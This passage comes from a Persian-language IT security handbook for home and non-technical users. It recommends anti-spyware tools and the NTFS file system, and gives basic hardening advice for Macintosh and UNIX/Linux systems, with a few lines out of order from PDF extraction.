ﺑﺮﻧﺎﻣﻪﻫـﺎﻳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺑـﺮﺍﻱ ﺍﻧـﻮﺍﻉ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺟﺴﺘﺠﻮ ﻣﻲﻛﻨﻨﺪ ،ﻣﺜﻞ:
ﺳﻴــــﺴﺘﻤﻬﺎﻱ ﻓﺎﻳــــﻞ FATﻭ FAT32ﻛــــﻪ ﺩﺭ
Windowsﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﻧﺪ ﺑﻄـﻮﺭ ﻛﺎﻣـﻞ
ﺍﻳﻤﻦ ﻧﻴﺴﺘﻨﺪ؛ ﺑﺨﺼﻮﺹ ﺍﮔﺮ ﺍﺯ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ .ﭼﻨﺎﻧﭽﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺍﻧﺠـﺎﻡ
ﻣﻲﺷﻮﺩ ،ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﻓﺎﻳـﻞ NTFS
ﺍﺳﺘﻔﺎﺩﻩ ﮔﺮﺩﺩ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺩﺳﺘﮕﺎﻩ
ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺑـﻴﺶ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ
ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﻮﺩ ﻳﺎ ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺑﻪ ﺩﻳـﺴﻚ
ﻫﻤﮕﻲ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ ﻓـﻮﻕ ﺭﺍﻳﮕـﺎﻥ ﻫـﺴﺘﻨﺪ ﻭ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠـﻒ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﻨﺪ.
120 Multi-User
121 File System
122 System Services
Pest Patrol
)(http://www.pestpatrol.com
Lavasoft
)(http://lavasoftusa.com/software/adawareplus/
SpybotSD
)(http://www.safer-networking.org
١٠١
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺑﺮﺭﺳﻲ ﺧﻼﺻﺔ ﺍﻣﻨﻴﺘﻲ
ﺍﮔﺮ ﺷﻤﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﻏﻴﺮﻓﻨـﻲ ﻫـﺴﺘﻴﺪ ﻭ ﻫـﻴﭻ ﺳـﺎﺯﻣﺎﻧﻲ
ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻤﺎ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ
Microsoftﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﻧﮕﻲ ﻧﮕﺎﻫﻲ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ:
http://www.microsoft.com/security/home
http://www.microsoft.com/protect/
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺍﺯ ﺗﻤـﺎﻣﻲ ﻭﺻـﻠﻪﻫـﺎ ﺑـﺮﺍﻱ
ﺣﻔﺎﻇــﺖ ﺍﺯ ﺳﻴــﺴﺘﻢ ﺍﺳــﺘﻔﺎﺩﻩ ﻛــﺮﺩﻩﺍﻳــﺪ .ﺑــﻪ ﭘﺎﻳﮕــﺎﻩ
ﺍﻃــﻼﻉﺭﺳــﺎﻧﻲ http://www.apple.comﺑﺮﻭﻳــﺪ ﻭ
ﺭﻭﻱ ﮔﺰﻳﻨﺔ Supportﻛﻠﻴﻚ ﻛﻨﻴﺪ .ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ
،Windowsﺍﻳﻨﺠﺎ ﻫـﻢ ﺍﻳـﻦ ﺍﺣﺘﻤـﺎﻝ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ
ﺳﻴﺴﺘﻢ ﺍﺻﻼﺡ ﻧﺸﺪﺓ ﺷﻤﺎ ﺑﻌﺪ ﺍﺯ ﺗﻨﻬﺎ ﭼﻨﺪ ﺳﺎﻋﺖ ﻳﺎ ﭼﻨﺪ
ﺭﻭﺯ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ؛ ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺭﻭﻱ ﺁﻥ ﻳـﻚ
ﺍﺭﺗﺒﺎﻁ ﺩﺍﺋﻤﻲ ﺷﺒﻜﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
http://www.microsoft.com/technet/security
ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪﻱ ﺩﺍﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ١٢٣MBSAﺭﺍ ﻛـﻪ
ﺑــﺮﺍﻱ ﺍﺭﺍﺋــﻪ ﺧــﺪﻣﺎﺕ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺑــﻪ ﺳﻴــﺴﺘﻤﻬﺎﻱ
Windows 2000ﻭ Windows XPﻃﺮﺍﺣﻲ ﺷـﺪﻩ
ﺭﻭﻱ ﺁﻥ ﻧﺼﺐ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ.
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ Macintosh
ﻧﻘﺎﻁ ﻗﻮﺕ ﻭ ﻧﻘﺎﻁ ﺿﻌﻒ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ Apple Macintoshﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺁﻧﻬﺎ ﻛﻤﺘﺮ ﺍﺯ
Windowsﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﭘﺬﻳﺮﺍﻱ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ.
ﺑﻌﻼﻭﻩ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻌﺪﺍﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ Macﻧﺴﺒﺖ ﺑـﻪ
ﺭﺍﻳﺎﻧﻪ ﻫﺎﻱ ﺷﺨﺼﻲ ﻛﻤﺘﺮ ﺍﺳﺖ ﻣﻬﺎﺟﻤﺎﻥ ﻋﻼﻗـﺔ ﻛﻤﺘـﺮﻱ ﺑـﻪ
ﺧﺮﺍﺑﻜﺎﺭﻱ ﺩﺭ ﺁﻧﻬﺎ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ .ﺷﺎﻳﺪ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ
ﺁﻧﻬﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ Macﺗﺼﻮﺭ ﻣﻲﻛﻨﻨﺪ ﻫﻤﻴﺸﻪ ﺍﻳﻤـﻦ
ﻫﺴﺘﻨﺪ ﻭ ﻫﻴﭽﮕـﺎﻩ ﻣـﻮﺭﺩ ﺁﺯﺍﺭ ﻭ ﺍﺫﻳـﺖ ﻛـﺴﻲ ﻗـﺮﺍﺭ ﻧﺨﻮﺍﻫﻨـﺪ
ﮔﺮﻓــﺖ .ﺳﻴــﺴﺘﻤﻬﺎﻱ MacOSﻛــﻪ ﭘــﻴﺶ ﺍﺯ MacOS X
ﺑﻮﺟﻮﺩ ﺁﻣﺪﻧﺪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻨﺎﺳﺒﺘﺮﻱ ﺩﺍﺷﺘﻨﺪ MacOS X .ﺑﺮ
ﺍﺳﺎﺱ FreeBSD UNIXﺍﺳﺖ ﻭ ﺑﺎﻳﺪ ﺑﺎ ﺩﻳﺪ ﻳـﻚ ﺳﻴـﺴﺘﻢ
UNIXﺧﺎﺹ ﻛﻪ ﺑﺎ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻪ
ﺁﻥ ﻧﮕﺎﻩ ﻛﺮﺩ )ﺍﻳﻦ ﻣـﻮﺭﺩ ﺩﺭ ﺑﺨـﺶ ﺑﻌـﺪﻱ ﻛـﻪ ﺩﺭ ﻣـﻮﺭﺩ UNIXﺍﺳـﺖ
ﺑﺮﺭﺳﻲ ﺷﺪﻩ( .ﺩﺭ ﻫﺴﺘﺔ ﻣﺮﻛﺰﻱ MacOS Xﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ
ﻣﺘﻌﺪﺩﻱ ﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﻣﺎ ﻫﻤﺔ ﺁﻧﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ.
ﭼﮕﻮﻧﻪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﻢ
123 Microsoft Baseline Security Analyzer
ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺗﻤﺎﻣﻲ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺑﺮﻱ ﻛـﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ
ﻧﻴﺴﺘﻨﺪ ﻏﻴﺮﻓﻌﺎﻝ ﻳﺎ ﺣﺬﻑ ﺷﺪﻩﺍﻧﺪ .ﺧﺼﻮﺻﹰﺎ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ
ﻛﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ guestﺑـﺪﻭﻥ ﺩﺍﺷـﺘﻦ ﺭﻣـﺰ ﻋﺒـﻮﺭ
ﻓﻌﺎﻝ ﻧﺒﺎﺷﺪ .ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺣﺴﺎﺑﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ
ﺁﻧﻬﺎ ﺯﻳﺎﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ ﻣﺤـﺪﻭﺩ ﺳـﺎﺯﻳﺪ ﻭ ﺍﺯ ﺣـﺴﺎﺏ
ﻛﺎﺭﺑﺮﻱ ﺭﺍﻫﺒﺮ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﻛـﻪ ﺑـﺪﻭﻥ ﺍﻣﺘﻴـﺎﺯ
ﺭﺍﻫﺒﺮﻱ ﻗﺎﺑﻞ ﺍﻧﺠﺎﻡ ﻫﺴﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ.
ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ
ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ.
ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺗﻌﻴـﻴﻦﺷـﺪﻩ
ﺩﺭ ﺣﺪﺍﻗﻞ ﺳﻄﺢ ﻣﻤﻜﻦ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ.
ﺧﺪﻣﺎﺕ
ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ ﺳـﺎﺯﻳﺪ .ﺍﮔـﺮ
ﺁﻧﻬﺎ ﺭﺍ ﺑﻄﻮﺭ ﻣﻮﻗﺘﻲ ﻓﻌﺎﻝ ﻣﻲﻛﻨﻴﺪ ﻳﺎﺩﺗﺎﻥ ﺑﺎﺷﺪ ﻛﻪ ﭘـﺲ
ﺍﺯ ﺍﺗﻤﺎﻡ ﻛﺎﺭ ﻣﺠﺪﺩﹰﺍ ﻫﻤﮕﻲ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺟﺪﻳﺪ
ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺟﺪﻳﺪ ﻣﺮﺗﺒﻂ ﺑـﺎ ﺷـﺒﻜﻪ )ﺧـﺼﻮﺻﹰﺎ
ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ UNIXﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﻧـﺪ( ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ
ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻗﺒﻞ ﺍﺯ MacOS Xﻫﺎ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ
ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺑﺎﺷﻨﺪ .ﺍﮔﺮ ﭼﻨﻴﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﺼﺐ ﻛـﺮﺩﻩﺍﻳـﺪ
ﻣﺮﺍﻗﺐ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑﺎﺷﻴﺪ.
ﺑﺨﺶ ﺩﻭﻡ
ﺍﮔﺮ ﻣﺘﺨﺼﺺ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ
ﭘﺎﻳﮕﺎﻩ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ:
ﺍﻧﺘﺸﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ
١٠٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ
ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻳـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺭﻭﻱ
ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻧﺼﺐ ﻛﻨﻴﺪ ﻭ ﺁﻧﺮﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ .ﻣﻄﻤـﺌﻦ
ﺷﻮﻳﺪ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈـﻴﻢ ﺷـﺪﻩﺍﺳـﺖ ﻛـﻪ
ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻫﺮ ﺍﺗﻔـﺎﻕ ﻏﻴﺮﻋـﺎﺩﻱ ﺑـﻪ ﺷـﻤﺎ ﻫـﺸﺪﺍﺭ
ﻣﻲﺩﻫﺪ.
ﺿﺪﻭﻳﺮﻭﺱ
ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺧـﻮﺩ ﻧـﺼﺐ
ﻛﻨﻴﺪ .ﺍﮔﺮ ﻧﺘﻮﺍﻧﺴﺘﻴﺪ ﻧﺴﺨﺔ ﺭﺍﻳﮕﺎﻥ ﺁﻧﺮﺍ ﺑﻴﺎﺑﻴﺪ ﺑﺎﻳﺪ ﻫﺰﻳﻨﺔ
ﻧﺴﺨﺔ ﺗﺠﺎﺭﻱ ﺁﻧﺮﺍ ﺑﭙﺮﺩﺍﺯﻳـﺪ .ﺑﺮﺧـﻲ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺑـﺮ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻭﺯﺍﻧﺔ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺧـﻮﺩ ﺗﺄﻛﻴـﺪ ﺩﺍﺭﻧـﺪ ﻭ
ﺑﺮﺧــﻲ ﺩﻳﮕــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻫﻔﺘﮕــﻲ ﺁﻧﻬــﺎ ﺭﺍ ﭘﻴــﺸﻨﻬﺎﺩ
ﻣﻲﻛﻨﻨﺪ .ﻃﺒﻴﻌﺘﹰﺎ ﻫﺮﭼﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻤﺎ ﺑﻪﺭﻭﺯﺗﺮ ﺑﺎﺷﺪ ﺑﻬﺘـﺮ
ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺣﻔﺎﻇﺖ ﻛﻨﺪ.
،Linux ،UNIXﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺎﺑﻪ
ﻧﻘﺎﻁ ﻗﻮﺕ ﻭ ﻧﻘﺎﻁ ﺿﻌﻒ
ﺳﻴــﺴﺘﻤﻬﺎﻱ Unixﺍﺯ ﺍﺑﺘــﺪﺍﻱ ﭘﻴــﺪﺍﻳﺶ ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ ﻋﻠــﻮﻡ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﻓﻴﺰﻳﻜﻲ ﺑﻌﻨﻮﺍﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ١٢٤ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ
)ﻫﻢ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ ﻭ ﻫﻢ ﺑـﺮﺍﻱ ﻣﺤﺎﺳـﺒﺎﺕ ﭼﻨـﺪﻛﺎﺭﺑﺮﻱ( ﺑﻜـﺎﺭ
ﻣﻲﺭﻓﺘﻨﺪ ﻭ ﻃﻲ ﺩﻫـﺔ ﮔﺬﺷـﺘﻪ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ Windowsﻭ
- Macintoshﻛﻪ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳﺴﺘﮕﺎﻩﻫـﺎﻱ ﻛـﺎﺭﻱ
ﺗﻚﻛﺎﺭﺑﺮﻩ ١٢٥ﺑﻮﺩﻧﺪ -ﺗﺎ ﺣﺪﻭﺩﻱ ﭘﻴﺸﻲ ﮔﺮﻓﺘﻨﺪ .ﺑـﺎ ﻣﺤﺒﻮﺑﻴـﺖ
ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ Linuxﺍﻳﻦ ﭘﺪﻳﺪﻩ ﮔﺴﺘﺮﺵ ﻳﺎﻓﺖ؛ ﺯﻳـﺮﺍ ﺍﺯ ﻳـﻚ
ﺳﻮ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺑﺴﻴﺎﺭ ﺟﺎﻟـﺐ ﻭ ﺟـﺬﺍﺏ ﺑـﻮﺩ ﻭ ﺍﺯ ﺳـﻮﻱ ﺩﻳﮕـﺮ
ﺑــﺮﺧﻼﻑ Windowsﻣــﺘﻦ ﺑﺮﻧﺎﻣــﺔ ﺁﻥ ﺑــﺼﻮﺭﺕ ﺭﺍﻳﮕــﺎﻥ ﺩﺭ
ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﮔﺮﻓﺖ .ﺍﻳﻦ ﻣﻮﺿـﻮﻉ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ
ﺗﻮﺳﻌﻪ ﺑﻴﺶ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺩﺭ ﻛﺎﻧﻮﻥ ﺗﻮﺟﻪﻫﺎ ﻭﺍﻗـﻊ
ﺷﺪ؛ ﭼﺮﺍﻛﻪ ﻫﺰﻳﻨﺔ ﺗﻬﻴﺔ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ
ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﻣﺘﻮﺳﻂ ﺳﻄﺢ ﺩﺭﺁﻣﺪ ﺍﻓﺮﺍﺩ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺗﺮ ﻣﻲﺑﺎﺷـﺪ.
ﺍﺯ ﻧﻘﺎﻁ ﻗﻮﺕ UNIXﻣﻲﺗـﻮﺍﻥ ﺑـﻪ ﺍﻧﻌﻄـﺎﻑﭘـﺬﻳﺮﻱ ﺁﻥ ﻭ ﻧﻴـﺰ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷـﺮﻛﺘﻬﺎ ﻃـﻲ ﺍﻳـﻦ ﺳـﺎﻟﻬﺎ
ﺑﺮﺍﻱ ﺁﻥ ﺗﻮﻟﻴﺪ ﺷﺪﻩﺍﻧﺪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ.
124 Workstation
125 Single-User
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻗﺪﺭﺕ ﻭ ﺍﻧﻌﻄﺎﻑ ﭘﺬﻳﺮﻱ UNIXﺑﺎ ﻛﺎﺭﺑﺮﭘـﺴﻨﺪ ﺑـﻮﺩﻥ
)ﺍﺯ ﺩﻳﺪ ﻳﻚ ﻛﺎﺭﺑﺮ ﺗﺎﺯﻩﻛﺎﺭ( ﻫﻤﺮﺍﻩ ﻧﺸﺪ .ﺩﺭﻧﺘﻴﺠـﻪ ﺯﻣـﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ
ﺳﻴــﺴﺘﻤﻬﺎ ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮﺍﻥ ﻏﻴــﺮ ﻣﺘﺨــﺼﺺ UNIXﺑﻌﻨــﻮﺍﻥ
ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﻧـﺪ ،ﻭﺟـﻮﺩ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻗـﻮﻱ ﺑـﺮﺍﻱ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎ ﻻﺯﻡ ﻣﻲﺷﻮﺩ .ﺩﺭ ﻫﺮ ﺣـﺎﻝ ﭘﺎﻳـﻪ ﻭ ﺍﺳـﺎﺱ
ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻫﻨﻮﺯ ﭘﻴﭽﻴﺪﻩ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﻲﺗﺠﺮﺑـﻪ ﻭ
ﺗﺎﺯﻩﻛﺎﺭ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺭﺍﻫﻬـﺎﻱ ﻭﺭﻭﺩ ﺭﺍ ﺑـﺮﺍﻱ
ﻳﻚ ﺧﺮﺍﺑﻜﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﺯ ﮔﺬﺍﺭﺩ .ﺍﮔﺮﭼـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ UNIX
ﻧﺴﺒﺘﹰﺎ ﻋﺎﺭﻱ ﺍﺯ ﻭﻳﺮﻭﺱ ﻫﺴﺘﻨﺪ ﻭﻟﻲ ﭘـﺬﻳﺮﺍﻱ ﺁﺧـﺮﻳﻦ ﻛﺮﻣﻬـﺎ ﻭ
ﺗﺮﻭﺍﻫﺎﻱ ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﻣﻲﺑﺎﺷﻨﺪ ،ﻭ ﻟـﺬﺍ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﻫﻨـﻮﺯ ﺟـﺰﺀ
ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﻩ ﺁﻧﻬﺎ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ.
ﭼﮕﻮﻧﻪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﻢ
ﺗﻤﺎﻣﻲ ﻋﻨﺎﻭﻳﻨﻲ ﻛﻪ ﺩﺭ ۷ﻓﺼﻞ ﮔﺬﺷـﺘﻪ ﺫﻛـﺮ ﺷـﺪﻧﺪ ﺩﺭ ﻣـﻮﺭﺩ
ﺳﻴﺴﺘﻤﻬﺎﻱ Linux ،UNIXﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣـﺸﺎﺑﻪ ﺁﻧﻬـﺎ ﻧﻴـﺰ
ﺻﺎﺩﻕ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺑﺨﻮﺍﻫﻴـﺪ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺭﺍ ﻭﺍﺟـﺪ
ﺍﻣﻨﻴﺖ ﻧﺴﺒﻲ ﻛﻨﻴﺪ ﺑﺎﻳﺪ ﺑﻪ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﭙﺮﺩﺍﺯﻳﺪ .ﺍﻳﻦ ﺑﺨـﺶ ﺭﻭﻱ
ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺗـﻚﻛـﺎﺭﺑﺮﻩ ﻣﺘﻤﺮﻛـﺰ ﺍﺳـﺖ .ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ
ﻣﺴﺌﻮﻝ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻫﺴﺘﻨﺪ ﺑﺎﻳﺪ ﺑﺨﺶ ﭘﻨﺠﻢ ﺍﻳـﻦ ﻛﺘـﺎﺏ
ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﻨﺪ.
ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ UNIX
ﺑﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺷـﺒﻴﻪ ،UNIX
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﻧﺼﺐ ﺷﺪﺓ
ﺍﻣﻨﻴﺘﻲ ١٢٦ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺑـﺴﻴﺎﺭ
ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﺭﺍﻫﻨﻤﺎﻱ ﻋﻤﻠﻲ ﺁﻥ ﻧﮕﺎﺭﺵ ﺍﺯ Unixﻛـﻪ
